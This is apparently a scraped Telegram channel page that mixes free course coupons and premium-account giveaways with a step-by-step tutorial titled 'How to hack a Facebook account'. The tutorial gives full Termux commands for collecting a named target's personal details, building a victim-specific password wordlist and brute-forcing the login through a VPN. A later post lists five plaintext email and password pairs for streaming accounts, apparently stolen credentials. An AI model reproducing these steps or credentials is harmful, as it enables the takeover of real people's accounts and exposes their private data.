HACK TECH COURSES
94 subscribers
305 photos
3 videos
11 files
314 links
🌟Get Unlimited Free Online Courses🌟
🀩With just a click🀩
πŸ”₯Hacking
πŸ”₯ML
πŸ”₯AI
πŸ”₯Python
πŸ”₯Java
πŸ”₯Web-development
πŸ”₯Android
πŸ”₯Photoshop, etc..

Join Our Discussion Group πŸ˜‰ : https://t.me/joinchat/yrgV8b-LdTcwNmU1
Download Telegram
Reverse Engineering: Create Your Own GUI CrackMe using C++

FREE For 48 Hrs

The fun way to learn how to build windows GUI programs by creating your own crackme's for reverse engineering

https://www.udemy.com/course/reverse-engineering-create-crackme/?couponCode=RECKMAR2

βž–βž– @Hack_Tech_Course βž–βž–
This media is not supported in your browser
VIEW IN TELEGRAM
❀️HOW TO HACK A FACEBOOK ACCOUNT❀️

✨Requirements:
- Termux
- 200 MB space
- Facebook target link
- Info about target
- Root

πŸ”°Setup:
$ apt install nodejs -y

$ pkg install git tsu -y

$ apt install python python2 -y

$ apt update; apt upgrade -y

$ npm install --global facebook-id-of

1️⃣ Getting ID

The first what we need is the ID of the facebook user, this can be found out through the facebook-id-of tool, which we have installed.

On the target profile, we can see URL like this:
https://www.facebook.com/michael.schmidt.7965692 β€” Remove the hyperlink and copy online name after facebook.com/.

$ facebook-id-of michael.schmidt.7965692

β€Ί Facebook ID of michael.schmidt.7965692 is 671393100

2️⃣ Dumping Information About Target

For this, we're gonna using the tool OSIF, it's still working and helping us, to get some details.

$ pkg update upgrade

$ pkg install git python2

$ git clone https://github.com/ciku370/OSIF

$ cd OSIF

$ pip2 install -r requirements.txt

❗️For this tool you need a working, non 2FA facebook account, which can be used for scanning our target. (TARGET MUST EXIST IN FRIEND LIST)

$ python2 osif.py
D3b2y >> token
Type username (email) & Password.

D3b2y >> cat_token
[*]Your access token !!

Setup done now Hype

D3b2y >> dump_id
D3b3y >> dump_671393100

❗️If you know your targets e-mail, it's much easier to attack them from the Β»bruteforceΒ« tool.

D3b3y Β» dump_mail

Now on to creating a wordlist for bruteforcing

🚨While people downloading random wordlists, creating wordlist with crunch and trying any other method with much effort, we can easily generate a wordlist related to information about our victim. This method has helped me several times to get into an Instagram account.

$ git clone https://github.com/Mebus/cupp.git; cd cupp/

$ python3 cupp.py -i

After tool has been started, fill out the information which you have dumped with OSIF.
It's asking :
> Do you want to add some key words about the victim? Y/[N]: y

> Please enter the words, separated by comma. [i.e. hacker,juice,black], spaces will be removed: football,blue,dog,maddisonschoolmarvelmovies,black,michaeljackson

> Do you want to add special chars at the end of words? Y/[N]: n

> Do you want to add some random numbers at the end of words? Y/[N]:y

> Leet mode? (i.e. leet = 1337) Y/[N]: y

$ cp -R test.txt $HOME

🚨Choose same, if you need keyword put all keywords about target, if you target likes barcelona football club, type barcelona,football.
❗️These keywords can be anything the victim likes. Mother's name, hobbies, favorite movies, food, color, sports, etc.

🚨It's saved as name, as you used for the firstname. If you don't know partner, use any best friend information, there are few apps like tellonym.me, instagram.com, snapchat.com to fetch as much information as you need.

Bruteforcing the account

$ pkg install nano -y

$ git clone https://github.com/TunisianEagles/SocialBox.git; cd SocialBox; chmod +x *.sh

$ nano install-sb.sh

Edit all sudo lines, only remove sudo:
sudo apt-get update
After:
apt update

Exit β€” ctrl+x β€” y (yes) β€” enter.

$ ./install-sb.sh

$ cp -R $HOME/test.txt $PWD

$ ./SocialBox.sh

❗️CP means we are copying our text file from cupp folder to home, then from home to the socialbox folder. Do it, you need in social a wordlist which has been created. If you don't want to copy it :

Choice > 1
Enter Facebook ID / Email / Username / Number: 671393100
Enter wordlist path : $HOME/cupp/test.txt

🚨Now the Bruterforcer will start to read your password list, or the word list you specified, and then try to test the password in the background using YOUR IP address. I have also tried to crack a Facebook account a few times, please use a VPN!

❣SHARE AND SUPPORT US❣

βž–βž– @Hack_Tech_Course βž–βž–
This media is not supported in your browser
VIEW IN TELEGRAM
⚑️GRAMMARLY ACCOUNT GIVEAWAY ⚑️

βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
⚑️ Task : First 10 Members to send the code will win

CODE: HACK_TECH

βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–

πŸ”₯Double Tap To CopyπŸ”₯

βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–

🎯 SEND CODE TO :- @HACK_TECH_GIVEAWAY_bot

βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–


🎯DONT DM ME FOR FREE ACCS OR U WILL BLOCKED 😑

🎯AFTER LOGIN SEND SCREENSHOT TO MY BOT OR ELSE NO GIVEAWAYS

βž–βž– @Hack_Tech_Course βž–βž–
This media is not supported in your browser
VIEW IN TELEGRAM
πŸ”°DATA STRUCTURE WITH PYTHONπŸ”°

FREE For 48 Hrs

The All-In-one Course for you to Conquer Data Structures with Python

https://www.udemy.com/course/data-structures-with-python/?couponCode=FREE2021PYTHON3

βž–βž– @Hack_Tech_Course βž–βž–
This media is not supported in your browser
VIEW IN TELEGRAM
✨Best Tips to Improve your coding skills in college 2021✨

https://blog.cyberstructor.net/improve-your-coding-skills-during-college/

βž–βž– @Hack_Tech_Course βž–βž–
This media is not supported in your browser
VIEW IN TELEGRAM
πŸ”°Automation Testing Masterclass – Java, Selenium and MoreπŸ”°

FREE For 24 Hrs

Become a full-stack automation tester, by learning about Selenium, Cucumber, Junit, Docker and other technologies!

https://www.udemy.com/course/automation-testing-masterclass/?couponCode=3795FF9C4258F6A2EAB2

βž–βž– @Hack_Tech_Course βž–βž–
This media is not supported in your browser
VIEW IN TELEGRAM
⚜️Which Premium Account I Should Post⚜️
Anonymous Poll
14%
Alt Balaji
33%
Zee 5
14%
Voot
33%
Nord VPN
5%
Hulu
This media is not supported in your browser
VIEW IN TELEGRAM
❀️ ZEE5 PREMIUM OPEN GIVEAWAY❀️

βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–

✨ AT 3:00 P.M. ✨

βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ“Œ PIN CHANNEL ON TOP πŸ“Œ
And
πŸ”Š UNMUTE πŸ”Š
To Get Notified For More Amazing Giveaways
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–

MORE COMING SOON πŸ˜‰

βž–βž– @Hack_Tech_Course βž–βž–
This media is not supported in your browser
VIEW IN TELEGRAM
❣ ZEE 5 PREMIUM ACCOUNT ❣

βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
Email : indranilsengupta11@gmail.com
Pass : Rupsa123

Email : hiral2176@gmail.com
Pass : hiral123

Email : harshalmamlekar6@gmail.com
Pass : harshalom

Email : harshul39@gmail.com
Pass : harshul39

Email : heroantony@gmail.com
Pass : nokiasofia

βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–

🎯 SEND SCREENSHOT TO :- @HACK_TECH_GIVEAWAY_bot

βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–

🎯AFTER LOGIN SEND SCREENSHOT TO MY BOT OR ELSE NO GIVEAWAYS

βž–βž– @Hack_Tech_Course βž–βž–
This media is not supported in your browser
VIEW IN TELEGRAM
Forwarded from Nisarg
Forwarded from Nisarg
Thanks bro 😁